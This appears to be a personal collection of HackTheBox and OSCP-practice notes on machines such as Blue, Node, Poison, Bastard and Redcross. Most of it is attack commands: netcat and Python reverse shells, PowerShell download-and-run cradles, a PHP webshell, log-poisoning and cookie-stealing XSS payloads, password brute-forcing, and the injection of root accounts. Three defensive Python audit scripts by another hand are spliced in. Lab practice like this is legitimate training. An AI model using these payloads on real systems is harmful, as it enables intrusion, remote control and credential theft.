Machines Practice

Follow this Medium series for OSCP-style HackTheBox machine writeups without MSF, by Rana :)


One way to get the root file (sudo vi with path traversal):

sudo /usr/bin/vi /var/www/html/../../../root/root.txt

Second way (set the shell from inside vi, then drop into it):

[email protected]:/home/haris$ sudo /usr/bin/vi /var/www/html/a
:set shell=/bin/sh
:shell

Third way (run a shell from the vi command line):

sudo vi /var/www/html/a -c ':!/bin/sh'
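The three tricks above all come from one sudo rule for an editor. The following is an added defender-side check, not code from the page or from Rana's notes: it parses a sudoers-style file and flags rules that hand out a binary able to spawn a shell. The regex, the binary list and the SAMPLE_SUDOERS excerpt are assumptions constructed for this example.

```python
import re
from typing import Dict, List

# Binaries that can launch a shell from inside the program (":shell", "-c ':!/bin/sh'",
# "!sh" in a pager). A sudo rule for any of them is a root shell, whatever path argument
# the rule tries to pin down, because "../" walks out of that path as well.
SHELL_ESCAPE_BINARIES = {"vi", "vim", "view", "less", "more", "man", "nano", "emacs", "ed"}

# user  host=(runas) TAG: cmd1, cmd2   (Defaults lines and comments are skipped)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def audit_sudoers(text: str) -> List[Dict[str, object]]:
    """Return one finding per sudo rule that grants a shell-escape-capable binary."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd == "ALL":
                continue  # unrestricted anyway; not what this check is for
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE_BINARIES:
                findings.append({
                    "user": m.group("user"),
                    "runas": m.group("runas") or "root",
                    "binary": binary,
                    "nopasswd": "NOPASSWD:" in m.group("tags"),
                    "rule": cmd,
                })
    return findings

# Constructed sudoers excerpt modelled on the page's "sudo /usr/bin/vi /var/www/html/..." rule.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
haris   ALL=(ALL) NOPASSWD: /usr/bin/vi /var/www/html/*, /bin/systemctl restart apache2
backup  ALL=(root) /usr/bin/rsync
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f)
```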

python '' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 9001 >/tmp/f"



nmap -n -v -Pn -p80,135,139,445,8080,49666,49667 -A --reason -oN nmap.txt
masscan -e tun0 -p1-65535,U:1-65535 --rate=700
smbmap -H -u guest -R | tee smbmap.txt
mount -t cifs -o rw,username=guest,uid=0,gid=0 //



mount -t cifs // /mnt -o user=,password=
find /mnt/ -type f
guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2
-sam SAM -security SECURITY -system SYSTEM LOCAL
java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7



echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/sh\",\"-i\"]);" >

/dev/shm - writable directory

sudo -u scriptmanager bash

Upload a reverse shell if the normal shell is not working

python -c 'import pty;pty.spawn("/bin/bash")'




hydra -l admin -P rockyou.txt http://ip http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect Username" - not working, the IP gets blocked



find . | grep controllers

ldd --version ; cat /etc/lsb-release (identify the glibc and Ubuntu versions)

One solution to get root

Create one file



Another trick to get an exploit for the Ubuntu version: the RationalLove exploit


Blue - Windows machine

EternalBlue: MS17-010

nmap -p 445 --script safe -Pn -n ip [nmap -p 445 --script "vuln and safe" -Pn -n ip]

EternalBlue exploit manually:

Modify the Python exploit and put the location of our payload in it

Exploit modification required

Add the computer name to the hosts file and then scan the SMB servers

smbclient -L \ -N

smbclient \\haris-pc\Users

python ip ntsvcs


Sense - Linux machine - pfSense

Manual command injection


On the attacker machine run this command

nc -vnlp port < cmd

In the file cmd we have this reverse shell code

import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("",3456)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2)["/bin/sh","-i"])

nc -lvnp 3456

exploit-db exploit



Port 80 is serving HttpFileServer (HFS)

tcpdump -i tun0
%00{.exec|ping}

Use Invoke-PowerShellTcp.ps1

From a 32-bit process on 64-bit Windows:
C:\Windows\SysWow64 - 32-bit binaries
C:\Windows\system32 - redirected to the 32-bit copies (a 32-bit shell gets the 32-bit powershell.exe)
C:\Windows\Sysnative - the real 64-bit System32

C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe ping

Ctrl+Shift+U - to URL-decode (Burp shortcut)

C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://ip:port/Invoke-PowerShellTcp.ps1')

Run the Sherlock script to enumerate missing patches (it reports false positives)

(New-Object Net.WebClient).DownloadString('http://ip:port/Invoke-PowerShellTcp.ps1')

Invoke-PowerShellTcp -Reverse -IPAddress -Port 1234

(New-Object Net.WebClient).DownloadString('')


cd /poweshell/Empire/data/module_source/privesc/Invoke-MS16032

IEX(New-Object Net.WebClient).downloadString('')

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('')"


Node - Linux

Port 3000 - Node.js app

sed 's/,/\n/g' notes - extract the passwords (split the JSON on commas)


Crack the hashes online and offline

Hashes cracked with hashcat and john:

hashcat -a0 -m 1400 dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af /usr/share/dict/rockyou.txt
john --format=Raw-SHA256 --wordlist=/usr/share/dict/rockyou.txt hash.txt
cat /home/alamot/.john/john.pot

online -

grep -Ri password . | less

fcrackzip - password cracker for zip files:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt

Download the file with wget (the session cookie is needed):

wget --header "Cookie: connect.sid=s%3AuGlwY_gicWrNb2ESIiDzUPn9TTi-Dstj.5E1wGaKmQ7QgeS%2BC5%2FfZ3mjy8DCwSdySPOv4rRvvZfU"

base64 -d myplace.backup >myplace

Privesc to the tom user

mongo -u 'mark' -p '5AYRft73VtFpc84k' scheduler

find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null

db.tasks.insert( { "cmd": "/bin/cp /bin/bash /tmp/tombash; chmod u+s /tmp/tombash;" } );

find / -perm -4000 2>/dev/null

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "asd /bin/bash asd"

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 r??t/roo?.txt

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root

Using a wildcard:

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /rt/rt.txt | base64 -d >

Command injection:

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'aaa\n/bin/sh\nls')"


Legacy - Windows

SMB scan

nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns

First exploit - MS08-067
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python 6 445

python rev_10.10.14.14_443.exe

Host the file with smbserver (share name a):

smbserver a /usr/share/windows-binaries/



Heartbleed vulnerability

python -n 100 ip

for i in $(seq 0 100); do python ip; done

Then find hype.key (decode hex to ASCII)

It is an SSH key; use this key with the passphrase obtained from Heartbleed

ssh -i hype.key [email protected]

Check the bash history and check ps -elf | grep root

Second exploit (Dirty COW)

gcc -pthread dirty.c -o dirty -lcrypt

su -


Fuzzy web app challenge

gobuster -u -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm

wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt

wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt

====================================== HDC HackTheBox Web Challenge Walkthrough/Solution

So the doProcess() function submits the form data to the jQuery file. Then I had a look at jquery-3.2.1.js, Ctrl+F and searched for doProcess().

Credentials are stored in the JS file, in the doProcess function

Find the emails in the secret folder, then brute-force all the emails and get the flag


Lernaean Web Challenge — HackTheBox

hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "/:password=^PASS^:Invalid Password!" -s 53593

========================================= CARTOGRAPHER

username= '- and password= '- : SQL injection


[20 Points] Lernaean [by Arrexel]

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/:password=^PASS^:Invalid password!" -s 35414

=========================================== [50 Points]

I know Mag1k [by rkmylo]

padbuster 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4"

padbuster 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4" -plaintext "{\"user\":\"qq\",\"role\":\"admin\"}"


Bastard - Windows

Drupal exploit payload changes (the webshell dropped through the REST endpoint; 'fupload' fetches a file from our host, 'fexec' runs a command):

$url = '';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$phpcode = <<<'EOD'
<?php
if (isset($_REQUEST['fupload'])) {
    file_put_contents($_REQUEST['fupload'], file_get_contents("" . $_REQUEST['fupload']));
};
if (isset($_REQUEST['fexec'])) {
    echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
};
?>
EOD;
$file = [ 'filename' => 'sam.php', 'data' => $phpcode ];

IEX(New-Object Net.WebClient).downloadString('')

\\\sam\ms15-051x64.exe "\\sam\nc64.exe -e cmd.exe 443"
[#] ms15-051 fixed by zcgonvh
powershell iex(new-object net.webclient).downloadstring('')

\\a\ms15-051x64.exe "\\a\nc64.exe -e cmd.exe 443"

powershell iex(new-object net.webclient).downloadstring('')


Shell with Nishang

python "SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs" 1 "powershell iex(new-object net.webclient).downloadstring('')"

\\\share\ms15-051x64.exe "whoami"
\\\share\ms15-051x64.exe "\\\share\nc64.exe -e cmd.exe 443"


Poison - machine is vulnerable to LFI

Add this shell to the User-Agent header (log poisoning):

User-Agent: 0xdf: <?php system($_GET['c']); ?>

Then include the log file through the LFI and append &c=id

Connectivity check:
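The poisoning above leaves two traces in the web server's own access log: the PHP tag in the User-Agent and the later traversal request that includes the log. As an added detection example (not from the page or Rana's notes), this scans combined-format log lines for both; the regexes and the SAMPLE_LOG lines are constructed assumptions for this example.

```python
import re
from typing import List, Tuple

# Apache/nginx "combined" log format. Assumption for this example: the user-agent field
# is read up to the next double quote, so an agent containing an escaped \" would need a
# stricter parser than this one.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)  # <?php or <?= in a header
PHP_EXEC_RE = re.compile(r"\b(?:system|exec|passthru|shell_exec|popen|eval)\s*\(", re.IGNORECASE)
LFI_RE = re.compile(r"(?:\.\./){2,}|php://|/var/log/|/etc/passwd", re.IGNORECASE)

def classify_line(line: str) -> List[str]:
    """Reasons why this access-log line looks like LFI log poisoning (empty = benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    reasons = []
    ua, req = m.group("ua"), m.group("req")
    if PHP_TAG_RE.search(ua) or PHP_EXEC_RE.search(ua):
        reasons.append("php_in_user_agent")  # the write that poisons the log
    if LFI_RE.search(req):
        reasons.append("lfi_request")        # the include that would execute it
    return reasons

def scan(log_text: str) -> List[Tuple[int, List[str]]]:
    return [(n, r) for n, l in enumerate(log_text.splitlines(), 1) if (r := classify_line(l))]

# Constructed sample log modelled on the page's User-Agent payload and the "&c=id" follow-up.
SAMPLE_LOG = """\
10.10.14.6 - - [01/Jan/2024:10:00:00 +0000] "GET /browse.php?file=ini.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.6 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.1" 200 312 "-" "0xdf: <?php system($_GET['c']); ?>"
10.10.14.6 - - [01/Jan/2024:10:00:09 +0000] "GET /browse.php?file=../../../../var/log/httpd-access.log&c=id HTTP/1.1" 200 9020 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(n, reasons)
```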

tcpdump -i tun0 icmp

view-source: 8081
nc -lnvp 8081

Shell as www

Visit view-source:;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f,

Listening on localhost:

netstat -an -p tcp
ps -auwwx | grep vnc

Tunneling / VNC connection

tail /etc/proxychains.conf
ssh [email protected] -D 8081
proxychains vncviewer -passwd secret

Looking inside /root/.vnc/, there's a passwd file that matches the file secret:

python /opt/ -d -f secret

LFI filter: php://filter/convert.base64-encode/resource=index.php

Request to put data into a PHP variable that is visible in phpinfo:

Content-Type: multipart/form-data; boundary=--PleaseSubscribe
Content-Length: 166

----PleaseSubscribe
Content-Disposition: form-data; name="sam"; filename="Leaveacomment"

Please share my videos



python id_rsa > brainfuck-crack

john brainfuck-crack --wordlist=/usr/share/wordlists/rockyou.txt

wpscan --url https://brainfuck.htb --disable-tls-checks

cp /usr/share/exploitdb/exploits/php/webapps/40939.txt .

WordPress exploit -> SMTP creds -> SMTP creds to get the secret forum password -> encryption/decryption

ssh2john id_rsa > id_john

john id_john --wordlist=/usr/share/wordlists/rockyou.txt

In orestis's home directory there are a few files: debug.txt, encrypt.sage and output.txt. After some Google searching, it turns out to be RSA encryption. RSA encryption relies on three prime numbers P, Q, E (two small and one large).

python -c "print format(24604052029401386049980296953784287079059245867880966944246662849341507003750, 'x').decode('hex')"
6efc1a5dbb8904751ce6566a305bb8ef


Grandparents (Granny & Grandpa)

iptables -A OUTPUT -d -j DROP

davtest --url

Check the MOVE method: MOVE ippsec.html with Destination: ippsec.aspx

MS14-070 exploit works for root; MS15-051 does not work

curl -X PUT --data-binary @shell.aspx
curl -X MOVE -H 'Destination: 5/shell.aspx'


Reverse shell with Metasploit

Check 3 exploits for privilege escalation: MS16-016, MS15-051, MS14-058. MS14-058 works fine:

msf5 exploit(windows/local/ms14_058_track_popup_menu)


Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow


Use exploit/windows/iis/iis_webdav_scstoragepathfromurl and set the options as below:

use exploit/windows/iis/iis_webdav_scstoragepathfromurl
options
set RHOST
set LHOST <attacking machine ip>
set LPORT 1234

use exploit/windows/local/ms15_051_client_copy_image
options



wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u -H "Host: FUZZ.redcross.htb" --hw 28 --hc 400
gobuster -k -u https://intra.redcross.htb/documentation -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,pdf -t 20

XSS payload in the contact-us form:

<script>new Image().src=""+document.cookie;</script>


On submitting the UserID filter, I'm sent to https://intra.redcross.htb/?o=1&page=app, where o= is the id filtered on. If I try with a ' in there, https://intra.redcross.htb/?o=1'&page=app:

sqlmap -r app.request --delay=1 --batch --dump
sqlmap -r login.req --risk=3 -p o --dbms=mysql --random-agent --delay=1.0 --technique=UE -T users --dbs
nmap -p- --min-rate 5000
python -c "ping -c 1" -t [email protected] -m
tcpdump -i tun0 -n icmp
python -c "php -r '\$sock=fsockopen(\"\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" -t [email protected] -m

Injection RCE

Burp Suite RCE:


Privesc to penelope

s = smtplib.SMTP(mailserver,1025)
./ -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/sh\",\"-i\"]);'" -t [email protected] -f [email protected] -m redcross

Privesc to root

[email protected]:/etc$ psql -h -U unixnss -W unix
openssl passwd -1 0xdf
insert into passwd_table (username, passwd, gid, homedir) values ('penel0xdf', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 1000, '/home/penelope');

Path 1: sudoers Group

insert into passwd_table (username, passwd, gid, homedir) values ('sud0xdfer', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 27, '/home/penelope');
sudo su

Path 2: Via unixnssroot

unix=> insert into passwd_table (username, passwd, gid, homedir) values ('ro0xdft', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, '/root');

Find psql Configs

ls -l nss-pgsql*
cat nss-pgsql-root.conf
psql -h -U unixnssroot -p 5432 -d unix

This user can add a user with user id 0 (root):

insert into passwd_table (username, passwd, uid, gid, homedir) values ('r0xdfot', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, 0, '/root');
su r0xdfot

Using this account, we are able to create a new user with UID 0:

insert into passwd_table (username, passwd, uid,gid, homedir) values ('snowscan_root','$6$oTkOZvS...',0,0,'/root');
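The inserts above work because nss-pgsql makes the database a passwd source, so `getent passwd` shows rows that /etc/passwd never had. As an added defender-side check (not from the page or Rana's notes), this compares the two and reports privileged accounts that only exist in a non-local NSS source; the sample entries and their UIDs are constructed assumptions, with gid 27 taken from the page's sudoers-group insert.

```python
from typing import Dict, List, NamedTuple

class PwEntry(NamedTuple):
    name: str
    uid: int
    gid: int
    home: str
    shell: str

def parse_passwd(text: str) -> Dict[str, PwEntry]:
    """Parse passwd(5)-formatted lines (from /etc/passwd or `getent passwd`)."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":", 6)
        entries[name] = PwEntry(name, int(uid), int(gid), home, shell)
    return entries

def audit_nss_accounts(local_text: str, getent_text: str,
                       privileged_gids=(0, 27)) -> List[str]:
    """Flag UID-0 or privileged-group accounts absent from /etc/passwd: getent merges
    every NSS backend (here the nss-pgsql passwd_table), so such rows were injected
    through the database rather than created locally."""
    local = parse_passwd(local_text)
    findings = []
    for e in parse_passwd(getent_text).values():
        if e.name in local:
            continue
        if e.uid == 0:
            findings.append(f"{e.name}: uid 0 (root) from non-local NSS source")
        elif e.gid in privileged_gids:
            findings.append(f"{e.name}: privileged gid {e.gid} from non-local NSS source")
    return findings

# Constructed sample data modelled on the page's passwd_table inserts (UIDs assumed).
LOCAL_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
penelope:x:1000:1000::/home/penelope:/bin/bash
"""
GETENT_PASSWD = LOCAL_PASSWD + """\
penel0xdf:x:1001:1000::/home/penelope:/bin/bash
sud0xdfer:x:1002:27::/home/penelope:/bin/bash
r0xdfot:x:0:0::/root:/bin/bash
"""

if __name__ == "__main__":
    for f in audit_nss_accounts(LOCAL_PASSWD, GETENT_PASSWD):
        print(f)
```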